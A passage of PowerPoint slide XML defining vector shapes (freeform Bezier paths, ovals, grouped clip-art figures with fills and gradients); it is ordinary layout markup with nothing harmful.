                    <a:gd name="T4" fmla="*/ 173 w 254"/>
                    <a:gd name="T5" fmla="*/ 55 h 200"/>
                    <a:gd name="T6" fmla="*/ 144 w 254"/>
                    <a:gd name="T7" fmla="*/ 27 h 200"/>
                    <a:gd name="T8" fmla="*/ 96 w 254"/>
                    <a:gd name="T9" fmla="*/ 14 h 200"/>
                    <a:gd name="T10" fmla="*/ 51 w 254"/>
                    <a:gd name="T11" fmla="*/ 2 h 200"/>
                    <a:gd name="T12" fmla="*/ 18 w 254"/>
                    <a:gd name="T13" fmla="*/ 13 h 200"/>
                    <a:gd name="T14" fmla="*/ 3 w 254"/>
                    <a:gd name="T15" fmla="*/ 96 h 200"/>
                    <a:gd name="T16" fmla="*/ 3 w 254"/>
                    <a:gd name="T17" fmla="*/ 96 h 200"/>
                    <a:gd name="T18" fmla="*/ 2 w 254"/>
                    <a:gd name="T19" fmla="*/ 99 h 200"/>
                    <a:gd name="T20" fmla="*/ 2 w 254"/>
                    <a:gd name="T21" fmla="*/ 99 h 200"/>
                    <a:gd name="T22" fmla="*/ 9 w 254"/>
                    <a:gd name="T23" fmla="*/ 118 h 200"/>
                    <a:gd name="T24" fmla="*/ 26 w 254"/>
                    <a:gd name="T25" fmla="*/ 119 h 200"/>
                    <a:gd name="T26" fmla="*/ 33 w 254"/>
                    <a:gd name="T27" fmla="*/ 117 h 200"/>
                    <a:gd name="T28" fmla="*/ 33 w 254"/>
                    <a:gd name="T29" fmla="*/ 117 h 200"/>
                    <a:gd name="T30" fmla="*/ 36 w 254"/>
                    <a:gd name="T31" fmla="*/ 116 h 200"/>
                    <a:gd name="T32" fmla="*/ 43 w 254"/>
                    <a:gd name="T33" fmla="*/ 114 h 200"/>
                    <a:gd name="T34" fmla="*/ 44 w 254"/>
                    <a:gd name="T35" fmla="*/ 76 h 200"/>
                    <a:gd name="T36" fmla="*/ 41 w 254"/>
                    <a:gd name="T37" fmla="*/ 77 h 200"/>
                    <a:gd name="T38" fmla="*/ 44 w 254"/>
                    <a:gd name="T39" fmla="*/ 53 h 200"/>
                    <a:gd name="T40" fmla="*/ 43 w 254"/>
                    <a:gd name="T41" fmla="*/ 171 h 200"/>
                    <a:gd name="T42" fmla="*/ 53 w 254"/>
                    <a:gd name="T43" fmla="*/ 183 h 200"/>
                    <a:gd name="T44" fmla="*/ 111 w 254"/>
                    <a:gd name="T45" fmla="*/ 199 h 200"/>
                    <a:gd name="T46" fmla="*/ 140 w 254"/>
                    <a:gd name="T47" fmla="*/ 177 h 200"/>
                    <a:gd name="T48" fmla="*/ 140 w 254"/>
                    <a:gd name="T49" fmla="*/ 171 h 200"/>
                    <a:gd name="T50" fmla="*/ 140 w 254"/>
                    <a:gd name="T51" fmla="*/ 139 h 200"/>
                    <a:gd name="T52" fmla="*/ 139 w 254"/>
                    <a:gd name="T53" fmla="*/ 98 h 200"/>
                    <a:gd name="T54" fmla="*/ 137 w 254"/>
                    <a:gd name="T55" fmla="*/ 84 h 200"/>
                    <a:gd name="T56" fmla="*/ 136 w 254"/>
                    <a:gd name="T57" fmla="*/ 79 h 200"/>
                    <a:gd name="T58" fmla="*/ 137 w 254"/>
                    <a:gd name="T59" fmla="*/ 84 h 200"/>
                    <a:gd name="T60" fmla="*/ 139 w 254"/>
                    <a:gd name="T61" fmla="*/ 98 h 200"/>
                    <a:gd name="T62" fmla="*/ 145 w 254"/>
                    <a:gd name="T63" fmla="*/ 136 h 200"/>
                    <a:gd name="T64" fmla="*/ 145 w 254"/>
                    <a:gd name="T65" fmla="*/ 137 h 200"/>
                    <a:gd name="T66" fmla="*/ 145 w 254"/>
                    <a:gd name="T67" fmla="*/ 137 h 200"/>
                    <a:gd name="T68" fmla="*/ 145 w 254"/>
                    <a:gd name="T69" fmla="*/ 142 h 200"/>
                    <a:gd name="T70" fmla="*/ 155 w 254"/>
                    <a:gd name="T71" fmla="*/ 165 h 200"/>
                    <a:gd name="T72" fmla="*/ 170 w 254"/>
                    <a:gd name="T73" fmla="*/ 171 h 200"/>
                    <a:gd name="T74" fmla="*/ 223 w 254"/>
                    <a:gd name="T75" fmla="*/ 155 h 200"/>
                    <a:gd name="T76" fmla="*/ 209 w 254"/>
                    <a:gd name="T77" fmla="*/ 119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54" h="200">
                      <a:moveTo>
                        <a:pt x="209" y="119"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="207" y="121"/>
                        <a:pt x="197" y="123"/>
                        <a:pt x="184" y="127"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="179" y="94"/>
                        <a:pt x="175" y="64"/>
                        <a:pt x="173" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="170" y="36"/>
                        <a:pt x="153" y="30"/>
                        <a:pt x="144" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="23"/>
                        <a:pt x="110" y="18"/>
                        <a:pt x="96" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="83" y="10"/>
                        <a:pt x="61" y="4"/>
                        <a:pt x="51" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="41" y="0"/>
                        <a:pt x="21" y="4"/>
                        <a:pt x="18" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="16"/>
                        <a:pt x="10" y="56"/>
                        <a:pt x="3" y="96"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96"/>
                        <a:pt x="3" y="96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0" y="109"/>
                        <a:pt x="4" y="116"/>
                        <a:pt x="9" y="118"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="121"/>
                        <a:pt x="20" y="120"/>
                        <a:pt x="26" y="119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4" y="117"/>
                        <a:pt x="35" y="117"/>
                        <a:pt x="36" y="116"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="38" y="116"/>
                        <a:pt x="41" y="115"/>
                        <a:pt x="43" y="114"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                        <a:pt x="44" y="76"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="76"/>
                        <a:pt x="42" y="77"/>
                        <a:pt x="41" y="77"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="60"/>
                        <a:pt x="44" y="49"/>
                        <a:pt x="44" y="53"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="59"/>
                        <a:pt x="43" y="123"/>
                        <a:pt x="43" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="177"/>
                        <a:pt x="47" y="182"/>
                        <a:pt x="53" y="183"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="67" y="186"/>
                        <a:pt x="102" y="197"/>
                        <a:pt x="111" y="199"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="120" y="200"/>
                        <a:pt x="138" y="190"/>
                        <a:pt x="140" y="177"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="175"/>
                        <a:pt x="140" y="173"/>
                        <a:pt x="140" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                        <a:pt x="140" y="139"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="124"/>
                        <a:pt x="140" y="111"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="92"/>
                        <a:pt x="137" y="87"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="82"/>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="79"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="136" y="80"/>
                        <a:pt x="136" y="82"/>
                        <a:pt x="137" y="84"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="138" y="88"/>
                        <a:pt x="138" y="93"/>
                        <a:pt x="139" y="98"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="140" y="108"/>
                        <a:pt x="142" y="120"/>
                        <a:pt x="145" y="136"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="136"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                        <a:pt x="145" y="137"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                        <a:pt x="145" y="142"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="148" y="154"/>
                        <a:pt x="151" y="161"/>
                        <a:pt x="155" y="165"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="159" y="169"/>
                        <a:pt x="164" y="170"/>
                        <a:pt x="170" y="171"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="186" y="167"/>
                        <a:pt x="204" y="161"/>
                        <a:pt x="223" y="155"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="254" y="147"/>
                        <a:pt x="236" y="110"/>
                        <a:pt x="209" y="119"/>
                      </a:cubicBezTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FF660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49" name="Freeform 1797"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2440" y="1214"/>
                  <a:ext cx="89" cy="56"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 66"/>
                    <a:gd name="T1" fmla="*/ 39 h 41"/>
                    <a:gd name="T2" fmla="*/ 10 w 66"/>
                    <a:gd name="T3" fmla="*/ 23 h 41"/>
                    <a:gd name="T4" fmla="*/ 16 w 66"/>
                    <a:gd name="T5" fmla="*/ 13 h 41"/>
                    <a:gd name="T6" fmla="*/ 54 w 66"/>
                    <a:gd name="T7" fmla="*/ 16 h 41"/>
                    <a:gd name="T8" fmla="*/ 57 w 66"/>
                    <a:gd name="T9" fmla="*/ 29 h 41"/>
                    <a:gd name="T10" fmla="*/ 30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6"/>
                        <a:pt x="16" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="10"/>
                        <a:pt x="54" y="0"/>
                        <a:pt x="54" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="54" y="21"/>
                        <a:pt x="47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50" name="Oval 1798"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="2429" y="1132"/>
                  <a:ext cx="119" cy="119"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:srgbClr val="FFCC99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</p:grpSp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="194" name="Group 905"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="5869104" y="1756005"/>
              <a:ext cx="1612019" cy="652067"/>
              <a:chOff x="2214" y="2038"/>
              <a:chExt cx="1288" cy="521"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="195" name="Freeform 420"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2214" y="2213"/>
                <a:ext cx="1288" cy="346"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 161"/>
                  <a:gd name="T1" fmla="*/ 22 h 44"/>
                  <a:gd name="T2" fmla="*/ 81 w 161"/>
                  <a:gd name="T3" fmla="*/ 0 h 44"/>
                  <a:gd name="T4" fmla="*/ 161 w 161"/>
                  <a:gd name="T5" fmla="*/ 22 h 44"/>
                  <a:gd name="T6" fmla="*/ 81 w 161"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 161"/>
                  <a:gd name="T9" fmla="*/ 2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44">
                    <a:moveTo>
                      <a:pt x="0" y="22"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="81" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="44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2B2B2">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="B2B2B2"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="190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96" name="Group 421"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2716" y="2206"/>
                <a:ext cx="286" cy="218"/>
                <a:chOff x="1722" y="2589"/>
                <a:chExt cx="866" cy="661"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="203" name="Group 422"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2182" y="2589"/>
                  <a:ext cx="312" cy="532"/>
                  <a:chOff x="1924" y="1129"/>
                  <a:chExt cx="312" cy="532"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="224" name="Freeform 423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924" y="1216"/>
                    <a:ext cx="312" cy="245"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 235 w 237"/>
                      <a:gd name="T1" fmla="*/ 113 h 186"/>
                      <a:gd name="T2" fmla="*/ 235 w 237"/>
                      <a:gd name="T3" fmla="*/ 113 h 186"/>
                      <a:gd name="T4" fmla="*/ 225 w 237"/>
                      <a:gd name="T5" fmla="*/ 49 h 186"/>
                      <a:gd name="T6" fmla="*/ 199 w 237"/>
                      <a:gd name="T7" fmla="*/ 24 h 186"/>
                      <a:gd name="T8" fmla="*/ 156 w 237"/>
                      <a:gd name="T9" fmla="*/ 12 h 186"/>
                      <a:gd name="T10" fmla="*/ 116 w 237"/>
                      <a:gd name="T11" fmla="*/ 2 h 186"/>
                      <a:gd name="T12" fmla="*/ 87 w 237"/>
                      <a:gd name="T13" fmla="*/ 12 h 186"/>
                      <a:gd name="T14" fmla="*/ 73 w 237"/>
                      <a:gd name="T15" fmla="*/ 85 h 186"/>
                      <a:gd name="T16" fmla="*/ 73 w 237"/>
                      <a:gd name="T17" fmla="*/ 85 h 186"/>
                      <a:gd name="T18" fmla="*/ 72 w 237"/>
                      <a:gd name="T19" fmla="*/ 90 h 186"/>
                      <a:gd name="T20" fmla="*/ 21 w 237"/>
                      <a:gd name="T21" fmla="*/ 104 h 186"/>
                      <a:gd name="T22" fmla="*/ 26 w 237"/>
                      <a:gd name="T23" fmla="*/ 135 h 186"/>
                      <a:gd name="T24" fmla="*/ 80 w 237"/>
                      <a:gd name="T25" fmla="*/ 122 h 186"/>
                      <a:gd name="T26" fmla="*/ 80 w 237"/>
                      <a:gd name="T27" fmla="*/ 122 h 186"/>
                      <a:gd name="T28" fmla="*/ 86 w 237"/>
                      <a:gd name="T29" fmla="*/ 120 h 186"/>
                      <a:gd name="T30" fmla="*/ 99 w 237"/>
                      <a:gd name="T31" fmla="*/ 112 h 186"/>
                      <a:gd name="T32" fmla="*/ 104 w 237"/>
                      <a:gd name="T33" fmla="*/ 92 h 186"/>
                      <a:gd name="T34" fmla="*/ 104 w 237"/>
                      <a:gd name="T35" fmla="*/ 92 h 186"/>
                      <a:gd name="T36" fmla="*/ 110 w 237"/>
                      <a:gd name="T37" fmla="*/ 47 h 186"/>
                      <a:gd name="T38" fmla="*/ 109 w 237"/>
                      <a:gd name="T39" fmla="*/ 160 h 186"/>
                      <a:gd name="T40" fmla="*/ 119 w 237"/>
                      <a:gd name="T41" fmla="*/ 170 h 186"/>
                      <a:gd name="T42" fmla="*/ 169 w 237"/>
                      <a:gd name="T43" fmla="*/ 184 h 186"/>
                      <a:gd name="T44" fmla="*/ 196 w 237"/>
                      <a:gd name="T45" fmla="*/ 165 h 186"/>
                      <a:gd name="T46" fmla="*/ 196 w 237"/>
                      <a:gd name="T47" fmla="*/ 160 h 186"/>
                      <a:gd name="T48" fmla="*/ 216 w 237"/>
                      <a:gd name="T49" fmla="*/ 155 h 186"/>
                      <a:gd name="T50" fmla="*/ 219 w 237"/>
                      <a:gd name="T51" fmla="*/ 154 h 186"/>
                      <a:gd name="T52" fmla="*/ 232 w 237"/>
                      <a:gd name="T53" fmla="*/ 146 h 186"/>
                      <a:gd name="T54" fmla="*/ 237 w 237"/>
                      <a:gd name="T55" fmla="*/ 124 h 186"/>
                      <a:gd name="T56" fmla="*/ 235 w 237"/>
                      <a:gd name="T57" fmla="*/ 113 h 186"/>
                      <a:gd name="T58" fmla="*/ 193 w 237"/>
                      <a:gd name="T59" fmla="*/ 75 h 186"/>
                      <a:gd name="T60" fmla="*/ 194 w 237"/>
                      <a:gd name="T61" fmla="*/ 87 h 186"/>
                      <a:gd name="T62" fmla="*/ 200 w 237"/>
                      <a:gd name="T63" fmla="*/ 123 h 186"/>
                      <a:gd name="T64" fmla="*/ 196 w 237"/>
                      <a:gd name="T65" fmla="*/ 124 h 186"/>
                      <a:gd name="T66" fmla="*/ 194 w 237"/>
                      <a:gd name="T67" fmla="*/ 87 h 186"/>
                      <a:gd name="T68" fmla="*/ 193 w 237"/>
                      <a:gd name="T69" fmla="*/ 75 h 186"/>
                      <a:gd name="T70" fmla="*/ 192 w 237"/>
                      <a:gd name="T71" fmla="*/ 70 h 186"/>
                      <a:gd name="T72" fmla="*/ 193 w 237"/>
                      <a:gd name="T73" fmla="*/ 75 h 1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37" h="186">
                        <a:moveTo>
                          <a:pt x="235" y="113"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="235" y="113"/>
                          <a:pt x="235" y="113"/>
                          <a:pt x="235" y="113"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="230" y="84"/>
                          <a:pt x="226" y="57"/>
                          <a:pt x="225" y="49"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="223" y="32"/>
                          <a:pt x="207" y="26"/>
                          <a:pt x="199" y="24"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="192" y="21"/>
                          <a:pt x="169" y="16"/>
                          <a:pt x="156" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="145" y="9"/>
                          <a:pt x="125" y="3"/>
                          <a:pt x="116" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="107" y="0"/>
                          <a:pt x="90" y="4"/>
                          <a:pt x="87" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="86" y="14"/>
                          <a:pt x="79" y="50"/>
                          <a:pt x="73" y="85"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="73" y="85"/>
                          <a:pt x="73" y="85"/>
                          <a:pt x="73" y="85"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="72" y="90"/>
                          <a:pt x="72" y="90"/>
                          <a:pt x="72" y="90"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="49" y="96"/>
                          <a:pt x="29" y="102"/>
                          <a:pt x="21" y="104"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="108"/>
                          <a:pt x="9" y="137"/>
                          <a:pt x="26" y="135"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="31" y="135"/>
                          <a:pt x="55" y="129"/>
                          <a:pt x="80" y="122"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="80" y="122"/>
                          <a:pt x="80" y="122"/>
                          <a:pt x="80" y="122"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="86" y="120"/>
                          <a:pt x="86" y="120"/>
                          <a:pt x="86" y="120"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="92" y="118"/>
                          <a:pt x="96" y="116"/>
                          <a:pt x="99" y="112"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="102" y="108"/>
                          <a:pt x="104" y="102"/>
                          <a:pt x="104" y="92"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="104" y="92"/>
                          <a:pt x="104" y="92"/>
                          <a:pt x="104" y="92"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="108" y="65"/>
                          <a:pt x="111" y="43"/>
                          <a:pt x="110" y="47"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="110" y="53"/>
                          <a:pt x="109" y="117"/>
                          <a:pt x="109" y="160"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="110" y="165"/>
                          <a:pt x="112" y="170"/>
                          <a:pt x="119" y="170"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="131" y="173"/>
                          <a:pt x="162" y="183"/>
                          <a:pt x="169" y="184"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="178" y="186"/>
                          <a:pt x="193" y="176"/>
                          <a:pt x="196" y="165"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="163"/>
                          <a:pt x="196" y="162"/>
                          <a:pt x="196" y="160"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="202" y="158"/>
                          <a:pt x="209" y="157"/>
                          <a:pt x="216" y="155"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="217" y="154"/>
                          <a:pt x="218" y="154"/>
                          <a:pt x="219" y="154"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="225" y="152"/>
                          <a:pt x="229" y="150"/>
                          <a:pt x="232" y="146"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="235" y="141"/>
                          <a:pt x="237" y="135"/>
                          <a:pt x="237" y="124"/>
                        </a:cubicBezTo>
                        <a:lnTo>
                          <a:pt x="235" y="113"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="193" y="75"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="194" y="79"/>
                          <a:pt x="194" y="83"/>
                          <a:pt x="194" y="87"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="96"/>
                          <a:pt x="198" y="108"/>
                          <a:pt x="200" y="123"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="199" y="123"/>
                          <a:pt x="197" y="123"/>
                          <a:pt x="196" y="124"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="111"/>
                          <a:pt x="195" y="99"/>
                          <a:pt x="194" y="87"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="194" y="82"/>
                          <a:pt x="193" y="78"/>
                          <a:pt x="193" y="75"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="192" y="73"/>
                          <a:pt x="192" y="72"/>
                          <a:pt x="192" y="70"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="192" y="72"/>
                          <a:pt x="193" y="73"/>
                          <a:pt x="193" y="75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FFFF"/>
                      </a:gs>
                      <a:gs pos="50000">
                        <a:srgbClr val="FFFFFF">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:srgbClr>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="FFFFFF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" name="Freeform 424"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2079" y="1200"/>
                    <a:ext cx="87" cy="54"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 30 w 66"/>
                      <a:gd name="T1" fmla="*/ 39 h 41"/>
                      <a:gd name="T2" fmla="*/ 10 w 66"/>
                      <a:gd name="T3" fmla="*/ 23 h 41"/>
                      <a:gd name="T4" fmla="*/ 16 w 66"/>
                      <a:gd name="T5" fmla="*/ 13 h 41"/>
                      <a:gd name="T6" fmla="*/ 54 w 66"/>
                      <a:gd name="T7" fmla="*/ 16 h 41"/>
                      <a:gd name="T8" fmla="*/ 57 w 66"/>
                      <a:gd name="T9" fmla="*/ 29 h 41"/>
                      <a:gd name="T10" fmla="*/ 30 w 66"/>
                      <a:gd name="T11" fmla="*/ 39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6" h="41">
                        <a:moveTo>
                          <a:pt x="30" y="39"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="14" y="37"/>
                          <a:pt x="0" y="25"/>
                          <a:pt x="10" y="23"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="17" y="21"/>
                          <a:pt x="13" y="15"/>
                          <a:pt x="16" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="19" y="10"/>
                          <a:pt x="54" y="0"/>
                          <a:pt x="54" y="16"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="54" y="21"/>
                          <a:pt x="48" y="25"/>
                          <a:pt x="57" y="29"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="66" y="33"/>
                          <a:pt x="46" y="41"/>
                          <a:pt x="30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6" name="Freeform 425"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeAspect="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="1973" y="1424"/>
                    <a:ext cx="209" cy="237"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 159 w 159"/>
                      <a:gd name="T1" fmla="*/ 6 h 180"/>
                      <a:gd name="T2" fmla="*/ 132 w 159"/>
                      <a:gd name="T3" fmla="*/ 21 h 180"/>
                      <a:gd name="T4" fmla="*/ 81 w 159"/>
                      <a:gd name="T5" fmla="*/ 11 h 180"/>
                      <a:gd name="T6" fmla="*/ 72 w 159"/>
                      <a:gd name="T7" fmla="*/ 0 h 180"/>
                      <a:gd name="T8" fmla="*/ 68 w 159"/>
                      <a:gd name="T9" fmla="*/ 19 h 180"/>
                      <a:gd name="T10" fmla="*/ 17 w 159"/>
                      <a:gd name="T11" fmla="*/ 32 h 180"/>
                      <a:gd name="T12" fmla="*/ 1 w 159"/>
                      <a:gd name="T13" fmla="*/ 55 h 180"/>
                      <a:gd name="T14" fmla="*/ 1 w 159"/>
                      <a:gd name="T15" fmla="*/ 145 h 180"/>
                      <a:gd name="T16" fmla="*/ 36 w 159"/>
                      <a:gd name="T17" fmla="*/ 156 h 180"/>
                      <a:gd name="T18" fmla="*/ 43 w 159"/>
                      <a:gd name="T19" fmla="*/ 145 h 180"/>
                      <a:gd name="T20" fmla="*/ 42 w 159"/>
                      <a:gd name="T21" fmla="*/ 73 h 180"/>
                      <a:gd name="T22" fmla="*/ 42 w 159"/>
                      <a:gd name="T23" fmla="*/ 73 h 180"/>
                      <a:gd name="T24" fmla="*/ 42 w 159"/>
                      <a:gd name="T25" fmla="*/ 72 h 180"/>
                      <a:gd name="T26" fmla="*/ 42 w 159"/>
                      <a:gd name="T27" fmla="*/ 66 h 180"/>
                      <a:gd name="T28" fmla="*/ 42 w 159"/>
                      <a:gd name="T29" fmla="*/ 64 h 180"/>
                      <a:gd name="T30" fmla="*/ 42 w 159"/>
                      <a:gd name="T31" fmla="*/ 63 h 180"/>
                      <a:gd name="T32" fmla="*/ 59 w 159"/>
                      <a:gd name="T33" fmla="*/ 41 h 180"/>
                      <a:gd name="T34" fmla="*/ 103 w 159"/>
                      <a:gd name="T35" fmla="*/ 30 h 180"/>
                      <a:gd name="T36" fmla="*/ 103 w 159"/>
